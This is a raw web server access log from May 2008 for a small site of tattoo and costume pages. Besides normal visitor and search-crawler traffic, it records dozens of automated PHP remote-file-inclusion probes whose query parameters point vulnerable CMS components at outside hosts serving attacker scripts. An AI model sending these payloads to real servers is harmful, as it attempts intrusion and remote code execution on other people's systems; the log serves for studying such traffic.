66.249.67.211 - - [28/May/2008:09:38:27 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.17.187 - - [28/May/2008:09:40:58 -0500] "GET /tattoo/set4.htm HTTP/1.0" 200 1991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.74.37.170 - - [28/May/2008:09:45:17 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.808"
195.74.37.170 - - [28/May/2008:09:45:18 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.808"
74.6.17.187 - - [28/May/2008:09:50:00 -0500] "GET /costume/index1.htm HTTP/1.0" 200 21563 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.34.138.245 - - [28/May/2008:09:52:42 -0500] "GET /logs/access_log.1204761600//modules/vwar/admin/admin.php?vwar_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
212.34.138.245 - - [28/May/2008:09:52:42 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
212.34.138.245 - - [28/May/2008:09:52:42 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
222.122.13.106 - - [28/May/2008:09:52:45 -0500] "GET /ScaN)http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
212.145.146.10 - - [28/May/2008:09:54:20 -0500] "GET /logs/access_log.1204761600//modules/vwar/admin/admin.php?vwar_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.803"
212.145.146.10 - - [28/May/2008:09:54:20 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
212.145.146.10 - - [28/May/2008:09:54:20 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:09:56:24 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:09:56:25 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
212.110.101.219 - - [28/May/2008:09:58:16 -0500] "GET /logs/errors.php?error=http://www.rsiservers.com/gb/new/public/root.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.63"
212.110.101.219 - - [28/May/2008:09:58:16 -0500] "GET /errors.php?error=http://www.rsiservers.com/gb/new/public/root.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.63"
195.74.37.170 - - [28/May/2008:10:00:54 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.808"
62.65.34.76 - - [28/May/2008:10:05:21 -0500] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://www.aquaclubdesign.gr/classes/phpmailer/id.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
62.65.34.76 - - [28/May/2008:10:05:22 -0500] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.aquaclubdesign.gr/classes/phpmailer/id.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
218.234.21.89 - - [28/May/2008:10:05:55 -0500] "GET //includes/functions_portal.php?phpbb_root_path=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 314 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
218.234.21.89 - - [28/May/2008:10:05:56 -0500] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 319 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
65.55.208.125 - - [28/May/2008:10:08:54 -0500] "GET /logs/access_log.1208995200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
200.89.198.133 - - [28/May/2008:10:13:07 -0500] "GET /logs//include/logout.php?PSA_PATH=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
200.89.198.133 - - [28/May/2008:10:13:07 -0500] "GET //include/logout.php?PSA_PATH=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
61.63.9.163 - - [28/May/2008:10:19:59 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.63"
61.63.9.163 - - [28/May/2008:10:19:59 -0500] "GET //skin/zero_vote/error.php?dir=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.63"
64.136.58.116 - - [28/May/2008:10:27:13 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
64.136.58.116 - - [28/May/2008:10:27:13 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
62.2.100.138 - - [28/May/2008:10:32:06 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:10:32:06 -0500] "GET //skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
87.106.10.53 - - [28/May/2008:10:34:54 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
87.106.10.53 - - [28/May/2008:10:34:54 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
62.2.100.138 - - [28/May/2008:10:35:36 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
62.2.100.138 - - [28/May/2008:10:35:37 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.803"
70.84.106.68 - - [28/May/2008:10:38:57 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
70.84.106.68 - - [28/May/2008:10:38:58 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
222.122.13.106 - - [28/May/2008:10:51:27 -0500] "GET /logs/access_log.1204761600//modules/vwar/admin/admin.php?vwar_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
222.122.13.106 - - [28/May/2008:10:51:27 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
222.122.13.106 - - [28/May/2008:10:51:28 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
82.240.66.144 - - [28/May/2008:10:56:28 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.fr/search?sourceid=navclient&hl=fr&ie=UTF-8&rlz=1T4GZEZ_frFR235FR235&q=vintage+tattoo+flash""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:28 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:29 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:34 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:34 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:34 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:34 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:34 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:34 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:34 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:35 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:35 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:35 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:35 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:41 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:41 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:41 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:41 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:41 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:42 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:42 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:42 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:43 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:43 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:43 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:49 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:49 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:49 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:49 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:49 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:50 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:50 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:51 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:51 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:51 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:51 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.60.74.190 - - [28/May/2008:10:56:55 -0500] "GET /logs/access_log.1204761600//modules/vwar/admin/admin.php?vwar_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
82.240.66.144 - - [28/May/2008:10:56:56 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.60.74.190 - - [28/May/2008:10:56:56 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
82.240.66.144 - - [28/May/2008:10:56:56 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:56 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:56 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:56 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:56 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.60.74.190 - - [28/May/2008:10:56:57 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
82.240.66.144 - - [28/May/2008:10:56:57 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:57 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:57 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:57 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:56:58 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:57:03 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:57:04 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:57:04 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.240.66.144 - - [28/May/2008:10:57:04 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.163.169.99 - - [28/May/2008:10:59:41 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
209.163.169.99 - - [28/May/2008:10:59:42 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
213.250.85.20 - - [28/May/2008:11:00:55 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://barconniere.online.fr/images/borda2.jpg? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
213.250.85.20 - - [28/May/2008:11:00:56 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://barconniere.online.fr/images/borda2.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
219.94.129.31 - - [28/May/2008:11:02:40 -0500] "GET /logs/access_log.1207785600//?mosConfig_absolute_path=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
219.94.129.31 - - [28/May/2008:11:02:41 -0500] "GET //?mosConfig_absolute_path=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
219.94.129.31 - - [28/May/2008:11:02:43 -0500] "GET /logs//?mosConfig_absolute_path=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 200 85278 "-""libwww-perl/5.805"
219.94.129.31 - - [28/May/2008:11:03:38 -0500] "GET /logs/access_log.1207008000//?mosConfig_absolute_path=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
65.55.208.124 - - [28/May/2008:11:11:40 -0500] "GET /logs/access_log.1205712000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.62.80.134 - - [28/May/2008:11:19:20 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 393 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
209.62.80.134 - - [28/May/2008:11:19:20 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 388 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
85.17.111.38 - - [28/May/2008:11:19:35 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 387 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
85.17.111.38 - - [28/May/2008:11:19:35 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 392 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
81.173.19.23 - - [28/May/2008:11:19:52 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 387 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
81.173.19.23 - - [28/May/2008:11:19:52 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 392 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
74.53.68.226 - - [28/May/2008:11:21:29 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 387 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
74.53.68.226 - - [28/May/2008:11:21:29 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 392 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
64.91.254.133 - - [28/May/2008:11:22:48 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://fadhilla.net/test.txt? HTTP/1.1" 404 383 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
64.91.254.133 - - [28/May/2008:11:22:49 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://fadhilla.net/test.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
212.227.103.40 - - [28/May/2008:11:28:56 -0500] "GET //eqdkp/admin/index.php?s=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 306 "-""Advanced Browser (http://www.avantbrowser.com)"
212.227.103.40 - - [28/May/2008:11:28:56 -0500] "GET /logs//eqdkp/admin/index.php?s=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 311 "-""Advanced Browser (http://www.avantbrowser.com)"
222.122.13.106 - - [28/May/2008:11:30:23 -0500] "GET /logs/access_log.1207180800//skin/zero_vote/error.php?dir=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
222.122.13.106 - - [28/May/2008:11:30:23 -0500] "GET //skin/zero_vote/error.php?dir=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
222.122.13.106 - - [28/May/2008:11:30:23 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
222.122.13.106 - - [28/May/2008:11:30:36 -0500] "GET /logs/access_log.1204761600//skin/zero_vote/error.php?dir=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
69.9.36.146 - - [28/May/2008:11:31:12 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 400 "-""libwww-perl/5.812"
69.9.36.146 - - [28/May/2008:11:31:12 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://exquisitedreams.com/catalog/readme.txt? HTTP/1.1" 404 395 "-""libwww-perl/5.812"
74.55.113.226 - - [28/May/2008:11:34:10 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 412 "-""libwww-perl/5.805"
74.55.113.226 - - [28/May/2008:11:34:10 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 407 "-""libwww-perl/5.805"
74.55.113.226 - - [28/May/2008:11:34:11 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.gasthof-neumeister.com/images/zoom/id.txt?? HTTP/1.1" 404 407 "-""libwww-perl/5.805"
